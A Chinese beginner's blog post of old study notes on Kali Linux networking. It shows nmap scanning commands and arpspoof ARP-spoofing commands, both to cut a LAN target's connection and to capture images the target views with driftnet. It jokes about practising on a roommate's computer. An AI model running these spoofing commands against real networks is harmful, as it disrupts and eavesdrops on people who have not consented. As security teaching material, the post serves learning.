文中可能存在错误操作或错误理解,望大家不吝指正.
同时也希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.
!阅前须知!
本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.
本文中的工具可能已经过时,或使用方法已经改变了,感兴趣可以深入查阅资料
(但是我还是列出以前的使用方法供大家借鉴).
ps.若对无线攻击手段与WiFi破解感兴趣可以参考以下两篇文章
【无线安全实践入门】基础攻击手段与常用工具简介
【无线安全实践入门】破解WiFi密码的多个方法
ps.本文环境在Kali下,学习最好具备一点linux基础知识.
1.网络扫描和嗅探
NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包
--NMap真的很常用,简直神器
--列出几种简单的使用方法:
--ping扫描,快速,不过回显的内容有限
> nmap -sP (网关IP)/(子网掩码)
--SYN/半开放扫描,加上-A回显详细信息
> nmap -sS [-A] (网关IP)/(子网掩码)
--单个扫描,显示详细内容
> nmap -A (目标IP)
--示例
> nmap -sP 192.168.1.1/24
2.ARP欺骗
局域网中的ARP欺骗还是比较有意思的.像arpspoof、Ettercap等工具都很不错.
arp欺骗之后其实可以很多动作的...
这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.
ps.有条件的话,可以拿手机或者室友电脑练手(doge脸).
--首先,在局域网环境中配合NMap工具使用,取得目标IP
> nmap -sP (网关IP)/(子网掩码)
2.1.断网攻击
ps.修改ip_forward的值,是为了开启IP转发,其值为‘0‘时候则禁止转发,目标主机断网.
--修改ip_forward(默认为'0')
--可以提前cat查看一下,若是回显'0',则可以跳过本步
> echo 0 > /proc/sys/net/ipv4/ip_forward
--开始arp欺骗
> arpspoof -i (你的网卡名称) -t (目标IP) (网关IP)
--使用目标主机上网测试,观察命令行回显.
2.2.图片捕获
--修改ip_forward(默认为'0')
--可以提前cat查看一下,若是回显'1',则可以跳过本步
> echo 1 > /proc/sys/net/ipv4/ip_forward
--开始arp欺骗(本机网卡名,可以用ifconfig来查看)
> arpspoof -i (本机网卡名) -t (目标IP) (网关IP)
--另外再开一终端,开始抓取图片
> drifnet -i (本机网卡名)
--使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.
常见的网络协议是网络安全中的基础,能让你能够更快吸收了解技术细节.
加油,共勉
原文地址:https://www.cnblogs.com/PisecesPeng/p/11174561.html
时间: 2024-10-08 18:13:21